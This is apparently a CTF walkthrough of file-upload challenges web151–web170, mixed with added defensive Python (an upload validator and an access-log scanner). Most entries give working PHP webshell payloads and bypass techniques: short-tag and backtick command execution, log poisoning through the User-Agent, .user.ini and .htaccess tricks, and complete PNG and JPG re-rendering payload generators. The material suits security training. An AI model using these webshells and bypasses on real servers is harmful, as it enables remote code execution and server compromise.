Getting started with the web - file upload
web151
Front-end verification
Change the accepted upload format to php, upload a one-line webshell, and connect with AntSword to get the flag.
web152
Back-end verification
Upload a one-line webshell as a png file and capture the request, then change the file name suffix to php; the file is parsed on access, and AntSword connects to get the flag.
web153
The page reveals an index.php file under /upload, so we can use .user.ini; see the article on the magic uses of the .htaccess and .user.ini configuration files and the PHP manual section on php.ini configuration directives.
Remove the suffix restriction on the front end (change accept to file), upload .user.ini with its Content-Type changed to image/png, and then a 1.txt file can be uploaded as well.
AntSword connects to get the flag.
web154
The method from the previous challenge reports that the file content is not compliant. It still doesn't work if we add GIF89a to the file header. After some attempts we found that "php" is filtered, so we use the short tag instead.
AntSword connects to get the flag.
web155
The method above still works.
web156
On top of the previous filters, [] is filtered as well; it can be replaced with {}.
web157
Now ; and { are filtered as well, but direct command execution still works:
<?=`tac ../fl*`?>
web158
Same as above:
<?=`tac ../fl*`?>
web159
Still works:
<?=`tac ../fl*`?>
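The checks that web151 through web159 walk around (front-end accept, client-supplied Content-Type, suffix filters, a GIF89a header, a keyword filter on "php") can be replaced by one server-side validator that trusts nothing the client chose. The Python below is an added example, not code from this writeup or from the challenge platform; the ALLOWED_EXT table, the rejection messages and the random storage name are my own choices.

```python
import os
import re
import secrets

# Allowed extensions with the magic bytes each must start with. These are the
# only suffixes a stored file will ever receive.
ALLOWED_EXT = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}

# A PHP open tag (long form, or the short tag used from web154 on) or a
# backtick, the shell-execution operator used in web157-web159.
PHP_TAG_RE = re.compile(rb"<\?|`")


class UploadRejected(Exception):
    pass


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Return a server-chosen filename for a safe upload, else raise UploadRejected.

    content_type is a parameter only to make the point that it is never consulted:
    the client picks it, which is what web152, web153 and web166 rely on."""
    base = os.path.basename(filename)
    # Dotfiles are configuration, not images: .htaccess (web167), .user.ini (web153).
    if base != filename or base.startswith("."):
        raise UploadRejected("bad filename")
    parts = base.lower().split(".")
    # Exactly one extension: rejects 1.txt, shell.php and double suffixes like x.png.php.
    if len(parts) != 2 or parts[1] not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed")
    ext = parts[1]
    # The body must carry the magic bytes of the extension it claims.
    if not data.startswith(ALLOWED_EXT[ext]):
        raise UploadRejected("content does not match extension")
    # A GIF89a header followed by PHP (web154) passes the magic check, so also scan
    # the bytes that will actually land on disk, after any server-side re-rendering.
    if PHP_TAG_RE.search(data):
        raise UploadRejected("script tag in body")
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename: str, content_type: str, data: bytes) -> bool:
    """Boolean wrapper so each bypass from the writeup can be checked in one call."""
    try:
        validate_upload(filename, content_type, data)
        return True
    except UploadRejected:
        return False
```

Running the writeup's own inputs through is_accepted shows each of them rejected at a different stage, while a genuine PNG is stored under a random name.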
web160
Log inclusion bypass:
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
First upload a .user.ini file, then upload a txt file with the content above (the path is split into "/var/lo"."g" because "log" is filtered). Then change the User-Agent to <?php eval($_POST[1]);?> and connect with AntSword to get the flag.
web161
When uploading the ini file, add GIF89A at the start, change the User-Agent to <?php eval($_POST[1]);?>, and connect with AntSword to get the flag.
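web160 and web161 get code execution by writing PHP into the User-Agent and then including nginx's access log. The defender's counterpart is to watch that log for request fields carrying PHP tags. This is an added Python example, not code from the writeup; the log lines are constructed and the format assumed is nginx's default combined format.

```python
import re

# nginx default "combined" format:
# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A PHP open tag (long or short form) or a backtick has no business in any
# client-controlled request field.
SCRIPT_RE = re.compile(r"<\?|`")


def find_poisoned(lines):
    """Return (line_no, field, value) for each line whose request, referer or
    User-Agent carries a PHP tag; lines that do not parse are checked whole."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = COMBINED_RE.match(line.rstrip("\n"))
        if m is None:
            if SCRIPT_RE.search(line):
                hits.append((n, "raw", line.strip()))
            continue
        for field in ("request", "referer", "ua"):
            if SCRIPT_RE.search(m.group(field)):
                hits.append((n, field, m.group(field)))
    return hits


# Constructed sample: one ordinary request, one request whose User-Agent is the
# payload used in web160/web161, one ordinary curl request.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /upload/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Mar/2024:10:00:09 +0000] "GET /upload/index.php HTTP/1.1" 200 512 "-" "<?php eval($_POST[1]);?>"',
    '10.0.0.7 - - [12/Mar/2024:10:00:15 +0000] "POST /upload.php HTTP/1.1" 200 64 "-" "curl/8.0.1"',
]

if __name__ == "__main__":
    for line_no, field, value in find_poisoned(SAMPLE_LOG):
        print(f"line {line_no}: PHP tag in {field}: {value}")
```

A hit here is a signal to look for a matching include in application code; the poisoned line itself stays harmless until some script includes the log file.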
web162、web163
Leaving these for now...
web164
<?php
// Byte table written into the pixels: after GD re-encodes the PNG, the
// resulting file still contains the one-line shell quoted at the bottom.
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
// Each group of three bytes becomes one RGB pixel on row 0.
for ($y = 0; $y < sizeof($p); $y += 3) {
    $r = $p[$y];
    $g = $p[$y+1];
    $b = $p[$y+2];
    $color = imagecolorallocate($img, $r, $g, $b);
    imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img, '2.png'); // path of the image to write
/* Webshell content carried by the image:
<?$_GET[0]($_POST[1]);?>
*/
?>
Run the script to generate the image, upload it, execute the command through it, then press Ctrl+S to save the returned file and get the flag.
web165
JPG secondary rendering (re-rendering) bypass:
<?php
$miniPayload = "<?php system('tac f*');?>";

if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
    die('php-gd is not installed');
}

if(!isset($argv[1])) {
    die('php jpg_payload.php <jpg_name.jpg>');
}

set_error_handler("custom_error_handler");

// Try increasing amounts of null-byte padding until GD's re-encoding keeps the payload.
for($pad = 0; $pad < 1024; $pad++) {
    $nullbytePayloadSize = $pad;
    $dis = new DataInputStream($argv[1]);
    $outStream = file_get_contents($argv[1]);
    $extraBytes = 0;
    $correctImage = TRUE;

    if($dis->readShort() != 0xFFD8) {
        die('Incorrect SOI marker');
    }

    // Walk the JPEG segments until the Start Of Scan (0xDA) marker.
    while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
        $marker = $dis->readByte();
        $size = $dis->readShort() - 2;
        $dis->skip($size);
        if($marker === 0xDA) {
            $startPos = $dis->seek();
            $outStreamTmp =
                substr($outStream, 0, $startPos) .
                $miniPayload .
                str_repeat("\0", $nullbytePayloadSize) .
                substr($outStream, $startPos);
            checkImage('_'.$argv[1], $outStreamTmp, TRUE);
            if($extraBytes !== 0) {
                // GD reported extraneous bytes before a marker: find the end of the
                // scan data (0xFF followed by a non-zero byte) and trim by that amount.
                while((!$dis->eof())) {
                    if($dis->readByte() === 0xFF) {
                        if($dis->readByte() !== 0x00) {
                            break;
                        }
                    }
                }
                $stopPos = $dis->seek() - 2;
                $imageStreamSize = $stopPos - $startPos;
                $outStream =
                    substr($outStream, 0, $startPos) .
                    $miniPayload .
                    substr(
                        str_repeat("\0", $nullbytePayloadSize) .
                        substr($outStream, $startPos, $imageStreamSize),
                        0,
                        $nullbytePayloadSize + $imageStreamSize - $extraBytes) .
                    substr($outStream, $stopPos);
            } elseif($correctImage) {
                $outStream = $outStreamTmp;
            } else {
                break;
            }
            if(checkImage('payload_'.$argv[1], $outStream)) {
                die('Success!');
            } else {
                break;
            }
        }
    }
}

unlink('payload_'.$argv[1]);
die('Something\'s wrong');

// Write the candidate bytes to disk and let GD decode them; any warning raised
// while decoding flips $correctImage through the error handler below.
function checkImage($filename, $data, $unlink = FALSE) {
    global $correctImage;
    file_put_contents($filename, $data);
    $correctImage = TRUE;
    imagecreatefromjpeg($filename);
    if($unlink)
        unlink($filename);
    return $correctImage;
}

// Records decode failures and extracts the "N extraneous bytes" count GD reports.
function custom_error_handler($errno, $errstr, $errfile, $errline) {
    global $extraBytes, $correctImage;
    $correctImage = FALSE;
    if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
        if(isset($m[1])) {
            $extraBytes = (int)$m[1];
        }
    }
}

// Minimal byte reader over the file contents (big-endian shorts by default).
class DataInputStream {
    private $binData;
    private $order;
    private $size;

    public function __construct($filename, $order = false, $fromString = false) {
        $this->binData = '';
        $this->order = $order;
        if(!$fromString) {
            if(!file_exists($filename) || !is_file($filename))
                die('File not exists ['.$filename.']');
            $this->binData = file_get_contents($filename);
        } else {
            $this->binData = $filename;
        }
        $this->size = strlen($this->binData);
    }

    // Current offset into the original data.
    public function seek() {
        return ($this->size - strlen($this->binData));
    }

    public function skip($skip) {
        $this->binData = substr($this->binData, $skip);
    }

    public function readByte() {
        if($this->eof()) {
            die('End Of File');
        }
        $byte = substr($this->binData, 0, 1);
        $this->binData = substr($this->binData, 1);
        return ord($byte);
    }

    public function readShort() {
        if(strlen($this->binData) < 2) {
            die('End Of File');
        }
        $short = substr($this->binData, 0, 2);
        $this->binData = substr($this->binData, 2);
        if($this->order) {
            $short = (ord($short[1]) << 8) + ord($short[0]);
        } else {
            $short = (ord($short[0]) << 8) + ord($short[1]);
        }
        return $short;
    }

    public function eof() {
        return !$this->binData || (strlen($this->binData) === 0);
    }
}
?>
# Usage: php exp.php a.png
web166
The front end requires a zip upload; we can upload a one-line webshell directly and change the Content-Type to application/x-zip-compressed.
web167
The challenge hints that httpd is in use, so we bypass with .htaccess:
AddType application/x-httpd-php .png // parse files with the .png suffix as PHP
Then upload an image containing a one-line webshell, and AntSword connects to get the flag.
web168
Basic AV evasion
Upload a png and capture the request, change the file extension to php, execute commands through the file, find that the flag is in the parent directory, and get RCE directly.
web169
First upload an index.php, then use log inclusion: upload a .user.ini, set the UA to a one-line webshell, and connect with AntSword.
web170
Ditto.